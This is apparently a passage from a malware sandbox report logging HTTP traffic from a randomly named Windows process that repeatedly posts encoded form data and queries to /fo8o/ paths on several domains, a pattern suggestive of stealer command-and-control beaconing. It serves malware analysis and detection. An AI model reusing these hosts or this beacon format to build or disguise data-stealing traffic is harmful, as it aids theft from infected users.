                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50020 | 195.110.124.133 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:56:14.750911951 CET | 818 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.elettrosistemista.zip
                                                                              Origin: http://www.elettrosistemista.zip
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.elettrosistemista.zip/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
                                                                              Data Ascii: SHqP-p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
Nov 21, 2024 12:56:16.110126972 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:15 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50021 | 195.110.124.133 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:56:17.412246943 CET | 10900 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.elettrosistemista.zip
                                                                              Origin: http://www.elettrosistemista.zip
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.elettrosistemista.zip/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 50 6f 6d 4c 43 66 2f 74 36 30 52 55 6f 71 73 39 59 75 51 4b 61 34 6f 35 70 72 44 76 4d 48 39 53 62 53 68 6a 65 48 2b 32 33 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 47 4c 61 4b 4e 65 70 57 45 41 32 2b 42 2b 44 43 52 31 73 43 35 72 75 62 64 54 48 39 48 45 6d 53 68 4b 67 37 75 52 70 75 59 43 72 6e 69 79 5a 4f 78 78 2b 66 77 38 68 64 6d 30 68 56 58 6f 4e 6d 78 71 49 59 47 2f 69 31 5a 34 2b 48 2f 6a 75 4d [TRUNCATED]
                                                                              Data Ascii: SHqP-p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUeLXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJMSF [TRUNCATED]
                                                                              Nov 21, 2024 12:56:18.871484041 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:18 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.4 | 50022 | 195.110.124.133 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:56:20.111155987 CET | 514 | OUT | GET /fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.elettrosistemista.zip
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:56:21.508615971 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:21 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.4 | 50023 | 217.196.55.202 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:56:43.579153061 CET | 786 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.empowermedeco.com
                                                                              Origin: http://www.empowermedeco.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.empowermedeco.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 76 4e 72 6a 75 6d 30 30 49 4c 61 47 32 41 39 45 68 75 48 58 68 74 4e 38 33 6a 33 52 2b 57 52 6b 41 3d 3d
                                                                              Data Ascii: SHqP-p=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
                                                                              Nov 21, 2024 12:56:44.789330006 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:44 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.4 | 50024 | 217.196.55.202 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:56:46.245217085 CET | 806 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.empowermedeco.com
                                                                              Origin: http://www.empowermedeco.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.empowermedeco.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 2b 68 77 71 44 63 39 72 59 2f 4a 32 6a 6d 44 58 34 6d 45 37 4c 4e 4e 4a 54 4a 57 65 6b 6a 6b 6f 3d
                                                                              Data Ascii: SHqP-p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
                                                                              Nov 21, 2024 12:56:47.450048923 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:47 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.4 | 50025 | 217.196.55.202 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:56:48.896096945 CET | 10888 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.empowermedeco.com
                                                                              Origin: http://www.empowermedeco.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.empowermedeco.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 78 48 57 62 6e 4e 6e 39 58 44 6b 63 50 7a 63 2f 49 66 5a 6e 42 33 59 7a 51 6e 57 4b 66 49 72 65 6b 75 34 32 30 73 63 6f 4b 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 5a 52 39 30 30 4c 6f 68 32 6c 42 77 34 6d 37 61 5a 69 6a 72 67 32 72 76 49 72 5a 7a 56 34 75 5a 39 32 42 53 54 4b 34 66 6a 2f 42 38 4e 6d 64 70 76 4c 64 4f 51 6b 65 66 4c 34 52 42 45 32 54 6a 57 6c 79 4a 38 76 47 6d 71 67 48 44 62 38 46 50 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=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 [TRUNCATED]
                                                                              Nov 21, 2024 12:56:50.143673897 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:49 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
